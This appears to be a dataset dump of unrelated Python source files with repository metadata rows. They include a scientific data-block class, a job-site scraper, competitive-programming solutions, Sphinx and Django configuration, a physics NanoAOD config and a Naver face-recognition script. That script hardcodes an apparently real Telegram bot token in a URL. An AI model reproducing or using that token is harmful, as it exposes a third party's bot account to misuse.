XML_VERSION = "1.0.0"
def __init__(self, attributes=None):
"""
Here we set up the standard functionality of the base class
"""
block_prep_identity.BlockPrepIdentity.__init__(self, attributes)
#----------------------------------------
# processing parameters
self.set = _Settings()
#----------------------------------------
# results storage
self.frequency_shift = None
self.phase_0 = None
self.data = None
if attributes is not None:
self.inflate(attributes)
self.chain = None
##### Standard Methods and Properties #####################################
# # This overrides the data property from the Identity class which is read
# # only. This form allows us to read/write
# def __get_data(self):
# return self._data
# def __set_data(self, data):
# self._data = data
# data = property(__get_data, __set_data)
@property
def dims(self):
"""Data dimensions in a list, e.g. [1024, 1, 1, 1]. It's read only."""
# Note that self.data.shape is a tuple. Dims must be a list.
if self.data is not None:
return list(self.data.shape[::-1])
return None
def __str__(self):
return self.__unicode__().encode("utf-8")
def __unicode__(self):
lines = mrs_data_raw.DataRaw.__unicode__(self).split('\n')
lines[0] = "----------- DataPrepMegalaser Object ------------"
lines.append("Data shape : %s" % str(self.dims))
return u'\n'.join(lines)
def create_chain(self, dataset):
self.chain = chain_prep_megalaser.ChainPrepMegalaser(dataset, self)
def set_dims(self, dataset):
"""
Given a Dataset object, this is an opportunity for this block object
to ensure that its dims match those of the parent dataset.
"""
block.Block.set_dims(self, dataset)
# local reference to input data
raw = dataset.get_source_data('prep')
# this is the calculated proper size for self.data
fidsum_dims = [raw.shape[-1],1,1,1]
if not self.dims or self.dims != fidsum_dims:
self._reset_dimensional_data(dataset)
def _reset_dimensional_data(self, dataset):
"""
Resets (to zero) and resizes dimensionally-dependent data
"""
# local reference to input data
raw = dataset.get_source_data('prep')
n_fids = raw.shape[-2]
self.frequency_shift = np.zeros([n_fids])
self.phase_0 = np.zeros([n_fids])
self.data = np.zeros((1,1,1,raw.shape[-1]), dtype=raw.dtype)
if self.chain is not None:
self.chain.reset_results_arrays()
def concatenate(self, new):
raise NotImplementedError
def deflate(self, flavor=Deflate.ETREE):
if flavor == Deflate.ETREE:
e = ElementTree.Element("block_prep_megalaser",
{ "id" : self.id,
"version" : self.XML_VERSION})
util_xml.TextSubElement(e, "behave_as_preset", self.behave_as_preset)
# Now I deflate the attribs that are specific to this class
e.append(self.set.deflate())
if not self.behave_as_preset:
e.append(util_xml.numpy_array_to_element(self.frequency_shift,'frequency_shift'))
e.append(util_xml.numpy_array_to_element(self.phase_0,'phase_0'))
e.append(util_xml.numpy_array_to_element(self.data, 'data'))
return e
elif flavor == Deflate.DICTIONARY:
return self.__dict__.copy()
def inflate(self, source):
if hasattr(source, "makeelement"):
val = source.findtext("behave_as_preset") # default is False
if val is not None:
self.behave_as_preset = util_xml.BOOLEANS[val]
# Quacks like an ElementTree.Element
self.set = _Settings(source.find("settings"))
if not self.behave_as_preset:
# Now I inflate the attribs that are specific to this class
temp = source.find("frequency_shift")
self.frequency_shift = util_xml.element_to_numpy_array(temp)
temp = source.find("phase_0")
self.phase_0 = util_xml.element_to_numpy_array(temp)
temp = source.find("data")
self.data = util_xml.element_to_numpy_array(temp)
elif hasattr(source, "keys"):
# Quacks like a dict
for key in source.keys():
if key == "set":
setattr(self, key, source[key])
##### Private Methods #####################################
| [
"[email protected]"
]
| |
9330cd3f6095c574c0fa566a8d69be0fec19b834 | a62a87ad976e3d35ea7879671190faf950ebaf3b | /scrapys/t.py | 47ae7f7a675a471d9db25b8bb6a431b20fa33406 | []
| no_license | YangXiaoo/Django-web | 144c8c1800d2a67bf8d1d203210aa351d31e8fb3 | 97903f309234fd1421a19a52a083f214172d6c79 | refs/heads/master | 2020-03-24T11:29:20.296017 | 2019-01-20T14:54:16 | 2019-01-20T14:54:16 | 142,687,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,264 | py | # -*- coding: utf-8 -*-
import re
import urllib2
import pandas as pd
#获取原码
def get_content(page):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.8'}
url ='http://search.51job.com/list/000000,000000,0000,00,9,99,python,2,'+ str(page)+'.html'
req = urllib2.Request(url,headers=headers)
res = urllib2.urlopen(req)
html = res.read()
re= unicode(html, "gbk").encode("utf8")
return re
def get(html):
reg = re.compile(r'class="t1 ">.*? href="(.*?)".*? <a target="_blank" title="(.*?)".*? <span class="t2"><a target="_blank" title="(.*?)" href="(.*?)".*?<span class="t3">(.*?)</span>.*?<span class="t4">(.*?)</span>.*? <span class="t5">(.*?)</span>',re.S)
items=re.findall(reg,html)
return items
def info_get(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.8'}
req = urllib2.Request(url,headers=headers)
res = urllib2.urlopen(req)
html = res.read()
html = unicode(html, "gbk").encode("utf8")
reg = re.compile(r'<span class="sp4"><em class="(.*?)"></em>(.*?)</span>',re.S)
based_info = re.findall(reg,html)
reg_p = re.compile(r'<span class="el">(.*?)</span>',re.S)
kind = re.findall(reg_p,html)
return based_info,kind
def address(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.8'}
req = urllib2.Request(url,headers=headers)
res = urllib2.urlopen(req)
html = res.read()
html = unicode(html, "gbk").encode("utf8")
reg_a = re.compile(r'<div class="tBorderTop_box bmsg">.*?</span>(.*?)</p>',re.S)
address = re.findall(reg_a,html)
return address
final = []
for j in range(1,2):
print("正在爬取第"+str(j)+"页数据...")
try:
html=get_content(j)
for i in get(html):
result = {}
with open ('51job.txt','a') as f:
f.write(i[0]+'\t'+i[1]+'\t'+i[2]+'\t'+i[3]+'\t'+i[4]+'\t'+i[5]+'\t'+i[6]+'\n')
f.close()
result['info_link'] = i[0]
info,kind = info_get(i[0])
count = 1
for n in info:
if count == 1:
result['experience'] = n[1]
count += 1
elif count == 2:
result['educational'] = n[1]
count += 1
else:
break
result['work_type'] = kind[0]
result['address'] = address
result['name'] = i[1]
result['company'] = i[2]
result['company_link'] = i[3]
result['work_place'] = i[4]
result['salary'] = i[5]
ad = address(i[3])
result['address'] = ad
result['publish_time'] = i[6]
final.append(result)
except:
pass
df = pd.DataFrame(final)
df.to_csv('51job-data_analysis.csv', mode = 'a',encoding = 'utf8')
| [
"[email protected]"
]
| |
91cf1bbafb30679fda22289ccab052d7605c72e6 | 503d2f8f5f5f547acb82f7299d86886691966ca5 | /typical90/typical90_cf.py | f610d0f1035ed452bc7992ce2b7ed0d6160b139f | []
| no_license | Hironobu-Kawaguchi/atcoder | 3fcb649cb920dd837a1ced6713bbb939ecc090a9 | df4b55cc7d557bf61607ffde8bda8655cf129017 | refs/heads/master | 2023-08-21T14:13:13.856604 | 2023-08-12T14:53:03 | 2023-08-12T14:53:03 | 197,216,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 937 | py | # https://atcoder.jp/contests/typical90/tasks/typical90_cf
# # def input(): return sys.stdin.readline().rstrip()
# # input = sys.stdin.readline
# from numba import njit
# from functools import lru_cache
# import sys
# input = sys.stdin.buffer.readline
# sys.setrecursionlimit(10 ** 7)
N = int(input())
S = input()
ans = 0
last = [-1]*2
for i in range(N):
if S[i]=='o':
last[0] = i
else:
last[1] = i
if last[0]==-1 or last[1]==-1:
continue
ans += min(last[0], last[1]) + 1
# print(ans, last)
print(ans)
# S = input()
# n = int(input())
# N, K = map(int, input().split())
# l = list(map(int, (input().split())))
# A = [[int(i) for i in input().split()] for _ in range(N)]
# import sys
# it = map(int, sys.stdin.buffer.read().split())
# N = next(it)
# @njit('(i8,i8[::1],i4[::1])', cache=True)
# def main():
# @lru_cache(None)
# def dfs():
# return
# return
# main()
| [
"[email protected]"
]
| |
b9edcccc00c10227f91be8740e4d744c0cea4347 | 2b8047e9e73a2f6fd43897cff19cb7e7c7c464d4 | /docssrc/source/conf.py | 5d48fbeb3fa4a5a1f8afc2bbac54d3f8fcfb3638 | [
"MIT"
]
| permissive | Peilonrayz/envee | 548fe08330a3b43bee5da1d64a0e406c781b990e | 66f5b6b1ff7f5966be794e1e3878418c560c1f65 | refs/heads/master | 2021-01-09T13:35:40.946529 | 2020-02-21T20:58:27 | 2020-02-21T20:58:27 | 242,321,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | import datetime
import pathlib
import sys
try:
import ConfigParser as configparser
except ImportError:
import configparser
FILE_PATH = pathlib.Path(__file__).absolute()
# Add documentation for tests
TLD = FILE_PATH.parent.parent.parent
sys.path.insert(0, str(TLD))
config = configparser.ConfigParser()
config.read(TLD / "setup.cfg")
project = "envee"
author = "Peilonrayz"
copyright = f"{datetime.datetime.now().year}, {author}"
release = config.get("src", "version")
master_doc = "index"
templates_path = ["_templates"]
exclude_patterns = []
doctest_global_setup = f"""
import {project}
"""
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.doctest",
"sphinx.ext.graphviz",
"sphinx.ext.githubpages",
"sphinx.ext.intersphinx",
"sphinx_autodoc_typehints",
"sphinx_rtd_theme",
]
intersphinx_mapping = {"python": ("https://docs.python.org/3", None)}
html_theme = "sphinx_rtd_theme"
html_static_path = ["_static"]
set_type_checking_flag = True
| [
"[email protected]"
]
| |
737f03f10ca5c122cad3e6ecd1ea3ca167ba591a | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_7114.py | 43772d7ec5384a7033d876749b4875f9abf3a978 | []
| no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | # global name 'find' is not defined
'python'.find('y') # gives 1
| [
"[email protected]"
]
| |
fbdea07de6f18420b99a57b116c79adf1f0463a1 | eac52a8ae7c539acedaedf8744bd8e20172f0af6 | /general/decode_ways.py | 33c70cc775b271c21d0bb448684acae24e9ffa65 | []
| no_license | mshekhar/random-algs | 3a0a0f6e6b21f6a59ed5e1970b7a2bc2044e191f | 7c9a8455f49027a754038b23aaa2df61fe5397ca | refs/heads/master | 2020-03-26T16:29:42.694785 | 2019-07-18T20:57:55 | 2019-07-18T20:57:55 | 145,105,593 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,895 | py | # A message containing letters from A-Z is being encoded to numbers using the following mapping:
#
# 'A' -> 1
# 'B' -> 2
# ...
# 'Z' -> 26
# Given a non-empty string containing only digits, determine the total number of ways to decode it.
#
# Example 1:
#
# Input: "12"
# Output: 2
# Explanation: It could be decoded as "AB" (1 2) or "L" (12).
# Example 2:
#
# Input: "226"
# Output: 3
# Explanation: It could be decoded as "BZ" (2 26), "VF" (22 6), or "BBF" (2 2 6).
# if not single_digit:
# all_single_possible[c] = False
# else:
# all_single_possible[c] = all_single_possible[c - 1] and all_single_possible[c]
# if c - 1 >= 0 and num_decodings[c - 1] > 0:
# num_decodings[c] = num_decodings[c - 1]
#
# if c - 1 >= 0:
# double_digit = self.get_decoding_count(s[c - 1] + i)
# if double_digit:
# print s[c - 1] + i, double_digit, num_decodings[c - 2] + int(all_single_possible[c - 2])
# if c - 2 >= 0 and num_decodings[c - 2] + int(all_single_possible[c - 2]) > 0:
# num_decodings[c] += num_decodings[c - 2] + 1
# elif c == 1:
# num_decodings[c] += 1
class Solution(object):
def get_decoding_count(self, s):
if not s.startswith('0') and 1 <= int(s) <= 26:
return 1
return 0
def numDecodings(self, s):
"""
:type s: str
:rtype: int
"""
num_decodings = [0] * len(s)
all_single_possible = True
for c, i in enumerate(s):
single_digit = self.get_decoding_count(i)
double_digit = 0
if c - 1 >= 0:
double_digit = self.get_decoding_count(s[c - 1] + i)
if not single_digit:
all_single_possible = False
if single_digit + double_digit > 0:
if single_digit:
num_decodings[c] = num_decodings[c - 1]
if all_single_possible and not num_decodings[c]:
num_decodings[c] = 1
if double_digit:
if c - 2 >= 0 and num_decodings[c - 2] > 0:
num_decodings[c] += num_decodings[c - 2]
elif c == 1:
num_decodings[c] += 1
# add one for all single decodings
# print num_decodings, all_single_possible
return num_decodings[-1]
print Solution().numDecodings("12"), 2
print Solution().numDecodings("226"), 3
print Solution().numDecodings("10"), 1
print Solution().numDecodings("103"), 1
print Solution().numDecodings("1032"), 1
print Solution().numDecodings("10323"), 1
print Solution().numDecodings("012"), 0
print Solution().numDecodings("110"), 1
print Solution().numDecodings("1212"), 5
# 1 2 1
# 12 1
# 1 21
#
# 1 2 1 2
#
# 12 1 2
# 12 12
#
# 1 21 2
# 1 2 12
# for i in ["0", "10", "10", "103", "1032", "10323"]:
# print(Solution().numDecodings(i))
| [
"[email protected]"
]
| |
07a345dba33878564304037a609dba06de767c0c | 36c00fe2afff4818c937e312ce0c6a79f35e2a77 | /7-kyu/happy-birthday,-darling!/python/solution.py | ab407ea9bcebd79b2d18c37ed24e86ac2368a137 | []
| no_license | p-lots/codewars | 0a67b6ee4c91180ff78c648421b9d2d64463ddc3 | 535faeee475c6b398124d6f5002b0e111406e8bb | refs/heads/master | 2023-08-23T22:14:33.635011 | 2023-08-23T13:30:37 | 2023-08-23T13:30:37 | 195,320,309 | 0 | 0 | null | 2023-05-09T19:25:50 | 2019-07-05T01:40:15 | Python | UTF-8 | Python | false | false | 164 | py | def womens_age(n):
base = n // 2 if n % 2 == 0 else (n - 1) // 2
new_n = 20 if n % 2 == 0 else 21
return f"{n}? That's just {new_n}, in base {base}!" | [
"[email protected]"
]
| |
d0c7805015d0990484841901a310a10805e00cf6 | 39be02fe4f8e8362a7acc005f3e30dd6fe47990e | /newdata/oylereader.py | 5ebdae4fcc852f8c821d74ed40ee95c9b06e915b | []
| no_license | seferlab/geneexpress | e2f6fdaa49e40cd48d0572cd9ddb5d2f45566adb | ac35bde5ba52d24981ece74e532f46bbfff9019e | refs/heads/master | 2022-12-19T08:33:16.925160 | 2020-09-29T13:51:30 | 2020-09-29T13:51:30 | 299,619,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | import os
import sys
import math
fname1 = "127 LCM time course Data Not normalized.txt"
fname2 = "127 LCM time course Quantile Normalized logbased 2 transformed.txt"
with open(fname1,"r") as infile:
for line in infile:
line = line.rstrip()
vals = line.split("\r")
splitted = vals[1].split("\t")
items1 = [float(splitted[tind]) for tind in xrange(1,len(splitted))]
with open(fname2,"r") as infile:
for line in infile:
line = line.rstrip()
vals = line.split("\r")
splitted = vals[1].split("\t")
items2 = [float(splitted[tind]) for tind in xrange(1,len(splitted))]
print items1[0:20]
print [math.log(titem,2.0) for titem in items1[0:10]]
print [math.log(titem+1.0,2.0) for titem in items1[0:10]]
print items2[0:20]
print items1[8:20]
| [
"[email protected]"
]
| |
f0b3e6949b78c44d35bdedc65dcdd7d848eae7f3 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/CodeJamData/10/33/17.py | b549582d467c3879831e6f099d36ecf18d3abe31 | []
| no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 1,617 | py | from itertools import count
def board(rows):
n = len(rows[0]) * 4
return [map(int, '{0:0{1}b}'.format(int(row, 16), n)) for row in rows]
def squares(board):
m, n = len(board), len(board[0])
#sq = {}
for r in xrange(m):
for c in xrange(n):
if board[r][c] == 2: continue
ns = findsquare(board, r, c)
yield ns, -r, -c
#fill(board, r, c, ns)
#sq[ns] = sq.get(ns, 0) + 1
#return sq
def solve(board):
result = {}
m, n = len(board), len(board[0])
while 1:
try:
n, r, c = max(squares(board))
except ValueError:
return result
result[n] = result.get(n, 0) + 1
fill(board, -r, -c, n)
def fill(board, r, c, n):
for i in xrange(r, r+n):
for j in xrange(c, c+n):
board[i][j] = 2
def findsquare(board, r, c):
x = board[r][c]
try:
for s in count(1):
for j in range(c, c+s+1):
x = 1 - x
if board[r+s][j] != x:
return s
for i in range(r+s-1, r-1, -1):
x = 1 - x
if board[i][c+s] != x:
return s
except IndexError:
return s
if __name__ == '__main__':
import sys
rl = iter(sys.stdin).next
for case in range(1, int(rl())+1):
M,N = map(int, rl().split())
lines = [rl().strip() for _ in range(M)]
b = board(lines)
sq = solve(b)
print 'Case #%d: %s' % (case, len(sq))
for k, v in sorted(sq.items(), reverse=True):
print k,v
| [
"[email protected]"
]
| |
238eb7c3a48a487377b765829fcb5eee86416ff5 | 24cf311c53c29e4e332cea01ee4de8196253a7b7 | /accounts/urls.py | ca8992d712669175ee1ef3193b0ea2d6ab348261 | []
| no_license | apengok/vsicravdoa | d017fe0c6a8606ef7bb74739354de1a2767b2a8a | e424b94007731189c2f14513798f2a9e9a45ba4c | refs/heads/master | 2020-03-10T23:07:48.145583 | 2018-06-01T09:18:25 | 2018-06-01T09:18:25 | 129,634,250 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | from django.conf.urls import url
from .views import (
AccountHomeView,
# AccountEmailActivateView,
UserDetailUpdateView
)
app_name = 'account'
urlpatterns = [
url(r'^$', AccountHomeView.as_view(), name='home'),
url(r'^details/$', UserDetailUpdateView.as_view(), name='user-update'),
# url(r'history/products/$', UserProductHistoryView.as_view(), name='user-product-history'),
# url(r'^email/confirm/(?P<key>[0-9A-Za-z]+)/$',
# AccountEmailActivateView.as_view(),
# name='email-activate'),
# url(r'^email/resend-activation/$',
# AccountEmailActivateView.as_view(),
# name='resend-activation'),
]
# account/email/confirm/asdfads/ -> activation view | [
"[email protected]"
]
| |
a20abcac99856f482d5e3f7ec4d5c5c93878dacd | 98f505e8275ed888818d8d6f77d27a9c275b55d8 | /face.py | a6d86359d258eda63f01fe71ba8a00892e28e706 | []
| no_license | EHwooKim/telegram | 13ac0afbd4ee5f91aa81b557183e9d8143fb1315 | 034ae64fa6283720fd55362b1b763cb3497ce4fc | refs/heads/master | 2022-12-11T19:53:23.942523 | 2019-07-12T07:41:29 | 2019-07-12T07:41:29 | 196,533,974 | 0 | 0 | null | 2022-12-08T05:52:25 | 2019-07-12T07:48:30 | Python | UTF-8 | Python | false | false | 959 | py | import pprint
import requests
from decouple import config
# 0. 이미지 파일
file_url = 'https://api.telegram.org/file/bot823224197:AAFwM03Ie4P8dBH45aKI75sMO0okZpcIqic/photos/file_2.jpg'
response = requests.get(file_url, stream=True)
image = response.raw.read()
# 1. 네이버 API 설정
naver_client_id = config('NAVER_CLIENT_ID')
naver_client_secret = config('NAVER_CLIENT_SECRET')
# 2. URL 설정
naver_url = 'https://openapi.naver.com/v1/vision/celebrity'
# 3. 요청 보내기! POST
headers = {
'X-Naver-Client-Id': naver_client_id,
'X-Naver-Client-Secret': naver_client_secret
}
response = requests.post(naver_url,
headers=headers,
files={'image':image}).json()
best = response.get('faces')[0].get('celebrity')
if best.get('confidence') > 0.2:
text = f"{best.get('confidence')*100}%만큼 {best.get('value')}를 닮으셨네요~"
else :
text = '사람이 아닙니다'
print(text) | [
"[email protected]"
]
| |
52860b1da6917fcd830a4b178bd3d28e8c60bf70 | 99dfd25f07b748e0b9b04ac300e135dc20570e1c | /cart/urls.py | 1731b6a31f6bbea06b4fcbb367549265a3127dd2 | []
| no_license | suipingooi/tgc10-django-deploy-checkpointPAUL | 1ec45e7135263703ff3472216f8fdcfdb379d7f3 | 46b62cdce8396c2b0cc57ec1fca4e77c0eee1e1a | refs/heads/master | 2023-04-16T05:11:20.535480 | 2021-04-14T12:02:43 | 2021-04-14T12:02:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | from django.urls import path
import cart.views
urlpatterns = [
path('add/<book_id>', cart.views.add_to_cart,
name="add_to_cart"),
path('', cart.views.view_cart, name='view_cart'),
path('remove/<book_id>', cart.views.remove_from_cart,
name="remove_from_cart"),
path('update_quantity/<book_id>', cart.views.update_quantity,
name="update_cart_quantity")
]
| [
"[email protected]"
]
| |
034a7d5e99bd493a04228ed2e4b4f1b71a6ec5c2 | 0cc4eb3cb54f8394c127ace62d3108fdb5230c85 | /.spack-env/view/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/profile.pyi | df940020d4066a6dc89ae87f2652df920ed8c8b4 | []
| no_license | jacobmerson/spack-develop-env | 5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8 | 5fca20ca343b1a76f05fc635c87f94ed25417d94 | refs/heads/master | 2022-07-04T02:22:50.264727 | 2020-05-06T05:13:50 | 2020-05-06T05:13:50 | 261,657,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | pyi | /lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/py-jedi-0.17.0-zugnvpgjfmuk5x4rfhhxlsknl2g226yt/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/profile.pyi | [
"[email protected]"
]
| |
bd13eec195727b03591f3658eaa75c0f54f16624 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03827/s915868982.py | 561cb7cb4a15cc5878feaba7bc58f0a5af14916d | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | N = int(input())
S = input()
x = 0
ans = 0
for s in S:
x += 1 if s == "I" else -1
ans = max(ans, x)
print(ans) | [
"[email protected]"
]
| |
2ca6a41f705f6ef795834db9d2bcbec1c4e7da99 | 9d0195aa83cc594a8c61f334b90375961e62d4fe | /JTTest/SL7/CMSSW_10_2_15/src/miniAODJobs600toInf/nano4.py | 1366df4f33cc6ad0c152e7cd8e25ea82efda4cf6 | []
| no_license | rsk146/CMS | 4e49592fc64f6438051544c5de18598db36ed985 | 5f8dab8c59ae556598b9747b52b88205fffc4dbe | refs/heads/master | 2022-12-01T03:57:12.126113 | 2020-08-04T03:29:27 | 2020-08-04T03:29:27 | 284,863,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,363 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: nanoAOD_jetToolbox_cff -s NANO --mc --eventcontent NANOAODSIM --datatier NANOAODSIM --no_exec --conditions 102X_upgrade2018_realistic_v19 --era Run2_2018,run2_nanoAOD_102Xv1 --customise_commands=process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False))) --customise JMEAnalysis/JetToolbox/nanoAOD_jetToolbox_cff.nanoJTB_customizeMC --filein file:cms/xaastorage/MINIAOD/Xaa_photons/diPhoton/x500_a100/XaaNLOttQED0_BBAR_M-x500_a100_MINIAODSIM_1.root --fileout file:jetToolbox_nano_mc.root
import FWCore.ParameterSet.Config as cms
import files50
from files50 import *
from Configuration.StandardSequences.Eras import eras
process = cms.Process('NANO',eras.Run2_2018,eras.run2_nanoAOD_102Xv1)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_cff')
process.load('PhysicsTools.NanoAOD.nano_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
# fileNames = cms.untracked.vstring('file:/cms/xaastorage/MINIAOD/2016/GJets/HT_100to200/GJet_100to200_1.root '),
fileNames = cms.untracked.vstring(A),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('nanoAOD_jetToolbox_cff nevts:1'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.NANOAODSIMoutput = cms.OutputModule("NanoAODOutputModule",
compressionAlgorithm = cms.untracked.string('LZMA'),
compressionLevel = cms.untracked.int32(9),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('NANOAODSIM'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:jetToolbox_nano_mc_2018GJetsHT600toInf_50.root'),
outputCommands = process.NANOAODSIMEventContent.outputCommands
)
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '102X_upgrade2018_realistic_v19', '')
# Path and EndPath definitions
process.nanoAOD_step = cms.Path(process.nanoSequenceMC)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.NANOAODSIMoutput_step = cms.EndPath(process.NANOAODSIMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.nanoAOD_step,process.endjob_step,process.NANOAODSIMoutput_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)
# customisation of the process.
# Automatic addition of the customisation function from PhysicsTools.NanoAOD.nano_cff
from PhysicsTools.NanoAOD.nano_cff import nanoAOD_customizeMC
#call to customisation function nanoAOD_customizeMC imported from PhysicsTools.NanoAOD.nano_cff
process = nanoAOD_customizeMC(process)
# Automatic addition of the customisation function from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff import nanoJTB_customizeMC
#call to customisation function nanoJTB_customizeMC imported from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
process = nanoJTB_customizeMC(process)
# End of customisation functions
# Customisation from command line
process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False)))
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion
| [
"[email protected]"
]
| |
fc521136d37bde83bf4b77d4966c06e6653d750b | 3f6c16ea158a8fb4318b8f069156f1c8d5cff576 | /.PyCharm2019.1/system/python_stubs/-1317042838/pandas/_libs/ops.py | a84d13f1d42b972f9af8b614b27048d38673cdb9 | []
| no_license | sarthak-patidar/dotfiles | 08494170d2c0fedc0bbe719cc7c60263ce6fd095 | b62cd46f3491fd3f50c704f0255730af682d1f80 | refs/heads/master | 2020-06-28T23:42:17.236273 | 2019-10-01T13:56:27 | 2019-10-01T13:56:27 | 200,369,900 | 0 | 0 | null | 2019-08-03T12:56:33 | 2019-08-03T11:53:29 | Shell | UTF-8 | Python | false | false | 2,829 | py | # encoding: utf-8
# module pandas._libs.ops
# from /var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/pandas/_libs/ops.cpython-36m-x86_64-linux-gnu.so
# by generator 1.147
# no doc
# imports
import builtins as __builtins__ # <module 'builtins' (built-in)>
import operator as operator # /usr/lib/python3.6/operator.py
import numpy as np # /var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/numpy/__init__.py
# functions
def maybe_convert_bool(*args, **kwargs): # real signature unknown
pass
def scalar_binop(*args, **kwargs): # real signature unknown
"""
Apply the given binary operator `op` between each element of the array
`values` and the scalar `val`.
Parameters
----------
values : ndarray[object]
val : object
op : binary operator
Returns
-------
result : ndarray[object]
"""
pass
def scalar_compare(*args, **kwargs): # real signature unknown
"""
Compare each element of `values` array with the scalar `val`, with
the comparison operation described by `op`.
Parameters
----------
values : ndarray[object]
val : object
op : {operator.eq, operator.ne,
operator.le, operator.lt,
operator.ge, operator.gt}
Returns
-------
result : ndarray[bool]
"""
pass
def vec_binop(*args, **kwargs): # real signature unknown
"""
Apply the given binary operator `op` pointwise to the elements of
arrays `left` and `right`.
Parameters
----------
left : ndarray[object]
right : ndarray[object]
op : binary operator
Returns
-------
result : ndarray[object]
"""
pass
def vec_compare(*args, **kwargs): # real signature unknown
"""
Compare the elements of `left` with the elements of `right` pointwise,
with the comparison operation described by `op`.
Parameters
----------
left : ndarray[object]
right : ndarray[object]
op : {operator.eq, operator.ne,
operator.le, operator.lt,
operator.ge, operator.gt}
Returns
-------
result : ndarray[bool]
"""
pass
def __pyx_unpickle_Enum(*args, **kwargs): # real signature unknown
pass
# no classes
# variables with complex values
__loader__ = None # (!) real value is '<_frozen_importlib_external.ExtensionFileLoader object at 0x7f43e7e6f8d0>'
__spec__ = None # (!) real value is "ModuleSpec(name='pandas._libs.ops', loader=<_frozen_importlib_external.ExtensionFileLoader object at 0x7f43e7e6f8d0>, origin='/var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/pandas/_libs/ops.cpython-36m-x86_64-linux-gnu.so')"
__test__ = {}
| [
"[email protected]"
]
| |
ce3333447ac28a3d89c0757d6ada515e638e5bd2 | 8410bb5a2e8849bb3a554b95ddc713d88f3440c4 | /aws-dev/awsdev9/venv/Lib/site-packages/dns/rdtypes/ANY/SOA.py | aec81cad8ac916e9bc71052ecbc4983cdabbd126 | [
"MIT"
]
